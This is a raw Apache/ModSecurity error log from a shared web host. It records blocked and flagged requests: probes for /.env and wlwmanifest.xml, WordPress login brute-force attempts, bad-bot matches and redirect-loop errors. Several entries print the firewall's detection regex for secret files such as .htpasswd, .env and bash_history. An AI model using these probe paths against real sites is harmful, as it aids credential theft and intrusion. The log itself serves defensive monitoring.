[Tue May 26 17:57:28.666377 2026] [security2:error] [pid 946381:tid 946583] [client 74.7.230.27:32914] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.divinternationalcourier.in.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWRsNiTu5WG4Dm5Wpr_fgAASBk"]
[Tue May 26 17:57:28.881542 2026] [security2:error] [pid 946381:tid 946595] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRsNiTu5WG4Dm5Wpr_egAAAFQ"]
[Tue May 26 17:57:28.953543 2026] [security2:error] [pid 946381:tid 946580] [client 168.144.101.237:52080] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWRsNiTu5WG4Dm5Wpr_igAAAEU"]
[Tue May 26 17:57:29.575968 2026] [security2:error] [pid 946381:tid 946589] [client 168.144.101.237:52318] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWRsdiTu5WG4Dm5Wpr_oAAAAE4"]
[Tue May 26 17:57:30.229169 2026] [security2:error] [pid 946381:tid 946584] [client 168.144.101.237:52531] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWRstiTu5WG4Dm5Wpr_swAAAEk"]
[Tue May 26 17:57:30.686729 2026] [security2:error] [pid 946381:tid 946571] [client 176.65.139.236:48628] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.jhonweb.com"] [uri "/.env"] [unique_id "ahWRstiTu5WG4Dm5Wpr_wQAAADw"]
[Tue May 26 17:57:30.872660 2026] [security2:error] [pid 946381:tid 946526] [client 168.144.101.237:52733] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWRstiTu5WG4Dm5Wpr_xAAAAA8"]
[Tue May 26 17:57:30.878958 2026] [security2:error] [pid 946381:tid 946535] [client 190.158.28.136:25369] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahWRstiTu5WG4Dm5Wpr_wwAAGEo"], referer: https://www.plenitudotonal.com/2023/
[Tue May 26 17:57:31.500619 2026] [security2:error] [pid 946381:tid 946582] [client 168.144.101.237:52985] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWRs9iTu5WG4Dm5Wpr_2gAAAEc"]
[Tue May 26 17:57:31.630518 2026] [security2:error] [pid 946381:tid 946573] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRs9iTu5WG4Dm5Wpr_zwAAAD4"]
[Tue May 26 17:57:32.136573 2026] [security2:error] [pid 946381:tid 946626] [client 168.144.101.237:53227] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWRtNiTu5WG4Dm5Wpr_5AAAAHM"]
[Tue May 26 17:57:33.218312 2026] [security2:error] [pid 946381:tid 946437] [remote 160.250.186.220:57108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRtdiTu5WG4Dm5WpoABAAAUjc"]
[Tue May 26 17:57:33.364664 2026] [security2:error] [pid 946381:tid 946533] [client 74.7.175.167:48954] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWRtdiTu5WG4Dm5WpoADgAAFk4"]
[Tue May 26 17:57:33.436278 2026] [security2:error] [pid 946381:tid 946574] [client 74.7.228.55:34488] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.gcirsm.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWRtdiTu5WG4Dm5WpoADwAAP2k"]
[Tue May 26 17:57:33.885968 2026] [security2:error] [pid 946381:tid 946515] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRtdiTu5WG4Dm5WpoAFQAAAAQ"]
[Tue May 26 17:57:36.078673 2026] [security2:error] [pid 946381:tid 946585] [client 14.240.79.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRt9iTu5WG4Dm5WpoAUgAAAEo"]
[Tue May 26 17:57:36.165831 2026] [security2:error] [pid 946381:tid 946541] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRt9iTu5WG4Dm5WpoAVQAAAB4"]
[Tue May 26 17:57:37.225718 2026] [security2:error] [pid 946381:tid 946388] [remote 209.42.20.53:42118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWRudiTu5WG4Dm5WpoAcgAATQY"]
[Tue May 26 17:57:38.023072 2026] [security2:error] [pid 946381:tid 946486] [remote 216.73.216.30:48169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRutiTu5WG4Dm5WpoAkAAAfmg"]
[Tue May 26 17:57:38.707611 2026] [security2:error] [pid 946381:tid 946532] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRutiTu5WG4Dm5WpoAmQAAABU"]
[Tue May 26 17:57:41.550775 2026] [security2:error] [pid 946381:tid 946516] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRvdiTu5WG4Dm5WpoA3wAAAAU"]
[Tue May 26 17:57:41.936556 2026] [security2:error] [pid 946381:tid 946571] [client 185.191.171.10:64010] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWRvdiTu5WG4Dm5WpoA8QAAADw"]
[Tue May 26 17:57:41.936708 2026] [security2:error] [pid 946381:tid 946571] [client 185.191.171.10:64010] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWRvdiTu5WG4Dm5WpoA8QAAADw"]
[Tue May 26 17:57:44.449855 2026] [security2:error] [pid 946381:tid 946568] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRwNiTu5WG4Dm5WpoBIwAAADk"]
[Tue May 26 17:57:44.720021 2026] [security2:error] [pid 946381:tid 946491] [remote 167.172.25.98:42324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRwNiTu5WG4Dm5WpoBLwAARm0"]
[Tue May 26 17:57:47.173390 2026] [security2:error] [pid 946381:tid 946534] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRwtiTu5WG4Dm5WpoBYAAAABc"]
[Tue May 26 17:57:47.457962 2026] [security2:error] [pid 946381:tid 946566] [client 176.65.139.236:23620] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.lagoslawntennisclub1895.com"] [uri "/.env"] [unique_id "ahWRw9iTu5WG4Dm5WpoBcQAAADc"]
[Tue May 26 17:57:47.550780 2026] [security2:error] [pid 946381:tid 946387] [remote 54.36.102.244:35182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWRw9iTu5WG4Dm5WpoBbQAAIwU"]
[Tue May 26 17:57:47.818782 2026] [security2:error] [pid 946381:tid 946402] [remote 54.36.102.244:35182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWRw9iTu5WG4Dm5WpoBeAAAFBQ"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 17:57:49.224494 2026] [core:error] [pid 946381:tid 946586] [client 74.7.175.160:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:57:49.224520 2026] [core:error] [pid 946381:tid 946586] [client 74.7.175.160:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:57:49.224649 2026] [security2:error] [pid 946381:tid 946586] [client 74.7.175.160:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "vishaal-shah.com"] [uri "/index.php"] [unique_id "ahWRxdiTu5WG4Dm5WpoBmgAAAEs"]
[Tue May 26 17:57:49.225510 2026] [security2:error] [pid 946381:tid 946588] [client 74.7.175.160:52578] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "vishaal-shah.com"] [uri "/robots.txt"] [unique_id "ahWRxdiTu5WG4Dm5WpoBmAAATXM"]
[Tue May 26 17:57:49.841946 2026] [security2:error] [pid 946381:tid 946516] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRxdiTu5WG4Dm5WpoBnwAAAAU"]
[Tue May 26 17:57:52.231853 2026] [security2:error] [pid 946381:tid 946548] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRx9iTu5WG4Dm5WpoB4wAAACU"]
[Tue May 26 17:57:53.197718 2026] [security2:error] [pid 946381:tid 946528] [client 66.249.66.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "rizpashop.com"] [uri "/index.php"] [unique_id "ahWRxtiTu5WG4Dm5WpoBxQAAABE"]
[Tue May 26 17:57:54.970392 2026] [security2:error] [pid 946381:tid 946573] [client 152.58.35.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWRytiTu5WG4Dm5WpoCYwAAAD4"], referer: https://www.ucdc.co.in/
[Tue May 26 17:57:54.983235 2026] [autoindex:error] [pid 946381:tid 946515] [client 152.58.35.38:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:57:54.985852 2026] [security2:error] [pid 946381:tid 946616] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRytiTu5WG4Dm5WpoCOQAAAGk"]
[Tue May 26 17:57:56.287913 2026] [security2:error] [pid 946381:tid 946446] [remote 160.250.186.220:48598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWRzNiTu5WG4Dm5WpoCfgAAOUA"]
[Tue May 26 17:57:57.788082 2026] [security2:error] [pid 946381:tid 946455] [remote 74.7.241.58:47930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWRzdiTu5WG4Dm5WpoCoQAAYUk"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 17:57:58.550208 2026] [security2:error] [pid 946381:tid 946548] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRztiTu5WG4Dm5WpoCrAAAACU"]
[Tue May 26 17:57:59.897794 2026] [security2:error] [pid 946381:tid 946511] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRz9iTu5WG4Dm5WpoCzAAAAAA"]
[Tue May 26 17:58:00.905577 2026] [security2:error] [pid 946381:tid 946466] [remote 193.42.61.12:51426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWR0NiTu5WG4Dm5WpoC4QAAT1Q"]
[Tue May 26 17:58:02.585303 2026] [security2:error] [pid 946381:tid 946584] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR0tiTu5WG4Dm5WpoDBgAAAEk"]
[Tue May 26 17:58:04.793618 2026] [security2:error] [pid 946381:tid 946612] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR1NiTu5WG4Dm5WpoDOgAAAGU"]
[Tue May 26 17:58:06.872649 2026] [security2:error] [pid 946381:tid 946617] [client 146.174.186.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR1tiTu5WG4Dm5WpoDbQAAAGo"]
[Tue May 26 17:58:08.109859 2026] [security2:error] [pid 946381:tid 946570] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR19iTu5WG4Dm5WpoDkwAAADs"]
[Tue May 26 17:58:10.086461 2026] [security2:error] [pid 946381:tid 946606] [client 198.199.65.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWR2diTu5WG4Dm5WpoDyAAAAF8"], referer: http://kardashevtechnologies.com/
[Tue May 26 17:58:10.301732 2026] [security2:error] [pid 946381:tid 946584] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR2diTu5WG4Dm5WpoDwwAAAEk"]
[Tue May 26 17:58:10.927950 2026] [core:error] [pid 946381:tid 946594] [client 45.148.10.204:55482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:10.927973 2026] [core:error] [pid 946381:tid 946594] [client 45.148.10.204:55482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.004068 2026] [core:error] [pid 946381:tid 946567] [client 45.148.10.204:55496] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.004088 2026] [core:error] [pid 946381:tid 946567] [client 45.148.10.204:55496] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.020054 2026] [core:error] [pid 946381:tid 946635] [client 45.148.10.204:55506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.020075 2026] [core:error] [pid 946381:tid 946635] [client 45.148.10.204:55506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.029085 2026] [core:error] [pid 946381:tid 946569] [client 45.148.10.204:55518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.029099 2026] [core:error] [pid 946381:tid 946569] [client 45.148.10.204:55518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.037417 2026] [core:error] [pid 946381:tid 946619] [client 45.148.10.204:55514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.037432 2026] [core:error] [pid 946381:tid 946619] [client 45.148.10.204:55514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.050327 2026] [core:error] [pid 946381:tid 946536] [client 45.148.10.204:55530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.050342 2026] [core:error] [pid 946381:tid 946536] [client 45.148.10.204:55530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.065329 2026] [core:error] [pid 946381:tid 946593] [client 45.148.10.204:55540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.065343 2026] [core:error] [pid 946381:tid 946593] [client 45.148.10.204:55540] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.095970 2026] [core:error] [pid 946381:tid 946629] [client 45.148.10.204:55546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.095988 2026] [core:error] [pid 946381:tid 946629] [client 45.148.10.204:55546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.139272 2026] [core:error] [pid 946381:tid 946538] [client 45.148.10.204:55548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.139307 2026] [core:error] [pid 946381:tid 946538] [client 45.148.10.204:55548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.282564 2026] [core:error] [pid 946381:tid 946572] [client 45.148.10.204:55554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.282580 2026] [core:error] [pid 946381:tid 946572] [client 45.148.10.204:55554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.327476 2026] [core:error] [pid 946381:tid 946524] [client 45.148.10.204:55560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.327494 2026] [core:error] [pid 946381:tid 946524] [client 45.148.10.204:55560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.333860 2026] [core:error] [pid 946381:tid 946608] [client 45.148.10.204:55570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.333887 2026] [core:error] [pid 946381:tid 946608] [client 45.148.10.204:55570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.353428 2026] [core:error] [pid 946381:tid 946563] [client 45.148.10.204:55574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
